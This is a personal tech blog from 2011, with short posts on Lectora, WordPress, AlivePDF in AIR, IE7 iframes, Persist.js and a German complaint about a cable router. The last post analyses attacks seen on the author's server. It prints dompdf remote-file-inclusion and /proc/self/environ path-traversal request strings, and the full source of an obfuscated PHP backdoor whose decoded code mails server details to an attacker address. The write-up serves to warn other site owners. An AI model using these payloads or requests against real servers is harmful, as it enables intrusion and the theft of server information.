Oct 302011
 

Moving global Items outside the window size in Lectora

  • create a new page
  • resize the dimensions of this new page to fit the global item's desired position
  • select the global item, move it
  • destroy the new page

That's it -> the global item is moved to a new position. It will show up correctly in your browser, for instance. I used this for an overlay container which gets some HTML code patched in.

 Posted by at 5:53 pm
Oct 222011
 

die Box ist kastriert und unter der Kontrolle von Kabel Deutschland:

  • FirmwareUpdates werden von Kabel Deutschland gemacht, nicht vom Benutzer
  • Andere Internet-Telefonie-Provider kann man nicht eintragen. Das wird angeblich teilweise mit DNS-Sperren enforced

Das ist ein extrem trauriges Zeugnis, sowohl für Kabel Deutschland, als auch für die Firma AVM – deren Hardware sonst ein Muster für Kunden-Offenheit ist.

Es gibt ein Workaround (Google ist dein Freund), ich finde es allerdings NICHT OK dass man zu Workarounds greifen muss. Sogar wenn man de jure die Box gemietet hat, de facto soll sie einem nützen, und technisch die vollen Möglichkeiten bieten. Ohne künstliche Kastrierung, grr!

Und falls die anderen Provider tatsächlich blockiert werden, dann muss ich mir überlegen wieder vom Anschluss zurückzutreten.

Oct 132011
 

Here are some pointers to useful tools and some solutions.

Good Geo IP location tool:

Reading large Zimbra log files:

/var/log/auth.log swamped by error messages (mail sudo: PAM adding faulty module: /lib/security/pam_smbpass.so):

This is an Ubuntu / Debian bug. Please follow this solution:

Zimbra admin guide (PDF):

Oct 092011
 

If you want to share code with others using your wordpress blog, usually, these people will run into problems with your shared (quoted) code. WordPress processes the quotation marks into curly ones, which break your code when copy & pasting.

There are two solutions to this problem:

Now my blog is cured from this problem :-)

 Posted by at 9:13 am
Oct 092011
 

It is built using Flash Builder 4 and the following steps:

Setup

  • create a new Air Project
  • add the .swc from Alive PDF v. 0.1.4.9 (0.1.5 is incompatible with AlivePDFTemplate at the moment)
  • add the cl folder from src of AlivePDF Template into your src folder

Import

add the following import statements, just after [CDATA[ in your <fx:Script> tag

import org.alivepdf.pdf.PDF;
import org.alivepdf.saving.Method;
import org.alivepdf.fonts.*;
import org.alivepdf.pages.Page;
import org.alivepdf.display.Display;
import org.alivepdf.layout.*;

import cl.huerta.pdf.PDFTemplate;
import cl.huerta.pdf.PDFi;
import cl.huerta.pdf.PDFParser;
import cl.huerta.pdf.decoders.ASCII85Decode;
import cl.huerta.pdf.PDFiPDFParser;
import cl.huerta.pdf.decoders.LZWDecode;
import cl.huerta.pdf.PDFContext;

Button

Add a button to control the process from the Design view (click on Design tab on top of your source). Click and drag the button from the available elements, then add a clickhandler under properties (on your right, click on the lightning bolt)

Code

Add the following code under the button click handler (based on the example given for AlivePDF Template).

//Must create a new PDFi instance (not PDF)
var myPDF : PDFi = new PDFi ( Orientation.PORTRAIT, Unit.MM, Size.LETTER );

// Import a file!!!! Just set the source file to an existing PDF
var pagecount:Number = myPDF.setSourceFile(File.desktopDirectory.nativePath + File.separator + "test.pdf" );
// Import a page. The first argument is the page number, the second the way it will be imported
var tplidx:Number = myPDF.importPage(1, '/MediaBox');

//This is important, you MUST add a page first!!!!
myPDF.addPage();
//Use the template in the current page
myPDF.useTemplate(tplidx, 10, 10, 90);

// This is not part of the original PDF. Just a test ^^
myPDF.setFont( FontFamily.ARIAL, Style.BOLD );
myPDF.setFontSize ( 18 );
myPDF.setXY( 10, 40 );
myPDF.addMultiCell ( 300, 1, "This is my PDF Headline" );

//Save the file
var f : FileStream = new FileStream();
var file : File = File.desktopDirectory.resolvePath("MyPDFi.pdf");
f.open( file, FileMode.WRITE);
var bytes : ByteArray = myPDF.save(Method.LOCAL);
f.writeBytes(bytes);
f.close();

Compile & Run

It will show an AIR window, with a button in it. On clicking the button the file "test.pdf" from your desktop (you should have placed one there!) will be added as a template to a new file MyPDFi.pdf.

Download

Download the project as exported (and zipped) by me http://blog.ideaday.de/max/wp-content/uploads/2011/10/ptair.zip

 Posted by at 8:35 am
Oct 082011
 

I have an IFRAME in my page which is positioned absolutely, and shown and hidden for overlaying additional information.

Testing IE 7 in a virtual machine crashed (processor load up to 100% for IE, no progress) this IFRAME for one specific page, others were fine.

I suspect that if the content in the IFRAME is going to be rendered in standards mode, this bug occurs. I force standards mode in my HTML documents by the appropriate <DOCTYPE> and a META Tag.

It is not present in either IE 6 or IE 9, so you might want to check for v 7 specifically and display a new window as workaround.

Sometimes programming for the web feels like herding a lot of cats, all meowing and running in different directions. Fix one thing, break another …

 Posted by at 9:17 pm
Oct 072011
 

If you browse a web page from your harddrive (that is, not hosted on a local apache, calling localhost, but using file://) you might notice, that your $.getJSON requests won't work -> your application will break.

This is by design, and a security measure.

If you only load static information via JSON – which you probably would in such an environment, right?, one (crutch of a) solution would be to include the information as a new .JS file (include it in your HTML head) which sets up a variable containing this information. This variable will replace your .getJSON call by a simple assignment.

 Posted by at 6:48 pm
Oct 062011
 

Yes, it seems to be by design (of Firefox' implementation of localstorage). It does not work for file:// URLs.

Persist.js currently has no workaround, the contents of your database will be cleared …

In order for Firefox to work offline, you have to remove the "localstorage" type manually, like this:

Persist.remove('localstorage');

Persist.js will issue a warning that globalStorage can't be used, and fall back to cookie storage, which has size limitations. On a side note, removing both localstorage and cookie storage will fall back to Flash. Flash will probably work, but it pops up a message which your users might find bewildering, and click away – viz:

persist

What is left after removing localstorage, cookie and flash?

Nothing (as Gears is not available).

Cookie's the way to go – you will have to live with the size restraints!

The way to check for larger strings than the storage allows does not seem to work for me. I used:

Persist.size != -1 && Persist.size < JSON.stringify(tmp_answer_db).length

One work around for larger data might be to use a JS compressor to fit all into the cookie. Or save less – reduce to the essential! Don't use JSON, use your own notation. Even JSON is too large for the cookie.

Update: Detecting firefox in a local file:// environment and removing localstorage

//detect FireFox. If it's the Fox, AND running locally remove localstorage
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && window.location.protocol == 'file:'){
Persist.remove('localstorage');
}

 Posted by at 10:01 pm
Oct 022011
 

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file, probably it's danger lies if used with the correct application. Here's the contents of vero.txt

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ1bml4b24yMDEwQGdtYWlsLmNvbSIsIlNldG9yYW4gQm9zICIuJHNhZmVtb2RlLCRib2R5LCRmbG9hdCk7"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safem
ode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $f
loat = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_S
ERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$
inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$saf
emode; mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

Actually the exploit has to be executed by DomPDF for it to work, i.e. meaning it should execute PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com

additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your PHP.ini.